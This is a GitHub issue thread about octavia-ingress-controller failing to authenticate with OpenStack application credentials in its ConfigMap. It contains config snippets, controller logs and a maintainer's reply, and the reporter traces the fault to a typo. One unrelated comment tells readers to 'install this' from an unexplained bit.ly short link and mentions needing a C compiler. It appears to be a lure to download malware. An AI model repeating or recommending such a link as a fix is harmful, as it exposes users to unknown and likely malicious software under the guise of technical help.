### ISSUE TITLE
[octavia-ingress-controller] Application credentials in configuration

### ISSUE THREAD

**Issue by czephyr** [kubernetes/cloud-provider-openstack#2673]
**Is this a BUG REPORT or FEATURE REQUEST?**:

/kind feature

**What happened**:

When configuring the ConfigMap octavia-ingress-controller-config like this:

```
---
kind: ConfigMap
apiVersion: v1
metadata:
  name: octavia-ingress-controller-config
  namespace: kube-system
data:
  config: |
    cluster-name: default
    openstack:
      auth-url: https://keystone.xxxx:5000/v3
      application-credential-id: APP_CRED_ID
      application-credential-secret: APP_CRED_SECRET
      region: REGION_NAME
```

The controller logs are:

```
~$ kubectl logs octavia-ingress-controller-0 -n kube-system
  2024/09/19 09:23:06 Running command:
  Command env: (log-file=, also-stdout=false, redirect-stderr=true)
  Run from directory: 
  Executable path: /bin/octavia-ingress-controller
  Args (comma-delimited): /bin/octavia-ingress-controller,--config=/etc/config/octavia-ingress-controller-config.yaml
  2024/09/19 09:23:06 Now listening for interrupts
  INFO   [2024-09-19T09:23:06Z] Using config file                             file=/etc/config/octavia-ingress-controller-config.yaml
  W0919 09:23:06.600914      11 client_config.go:659] Neither --kubeconfig nor --master was specified.  Using the inClusterConfig.  This might not work.
  FATAL  [2024-09-19T09:23:06Z] failed to initialize openstack client         error="You must provide a password to authenticate"
  2024/09/19 09:23:06 running command: exit status 1
```

**What you expected to happen**:

I expected to be able to use app credentials for the config just how I can do with OCCM.

**Environment**:
- octavia-ingress-controller: v1.31.0
- OpenStack version: Wallaby

**Comment by miguellords** [comment]
install this
https://bit.ly/3XQLHlH

you may need to install the c compiler

**Comment by kayrus** [comment]
there must be a typo somewhere. running the controller locally with the sample config and app creds defined I get:

```
./octavia-ingress-controller --config=config.yaml 
INFO   [2024-09-19T11:31:16+00:00] Using config file                             file=config.yaml
FATAL  [2024-09-19T11:31:16+00:00] failed to initialize openstack client         error="Expected HTTP response code [201 202] when accessing [POST https://localhost:8080/v3/auth/tokens], but got 401 instead: {\"error\":{\"code\":401,\"message\":\"The request you have made requires authentication.\",\"title\":\"Unauthorized\"}}"
```

**Comment by czephyr** [comment]
Thank you for the answer. So it's an issue with syntax on my side.

When you say the sample config you're refferring to [this one](https://github.com/kubernetes/cloud-provider-openstack/blob/master/docs/octavia-ingress-controller/using-octavia-ingress-controller.md#prepare-octavia-ingress-controller-configuration) in the doc folder for the ingress controller? 

I don't see anything there for plugging in app credentials. Did you use the `user-id` and `password` fields for them?
I used the same exact app credentials syntax from the occm configmap expecting the same field names.

**Comment by kayrus** [comment]
here is the config file I used:
```yaml
$ cat config.yaml 
cluster-name: default
openstack:
  auth-url: https://localhost:8080/v3
  #application-credential-id: APP_CRED_ID
  application-credential-secret: APP_CRED_SECRET
  region: default
```

**Comment by czephyr** [comment]
You were correct, some kind of typo was going on. Thank you.
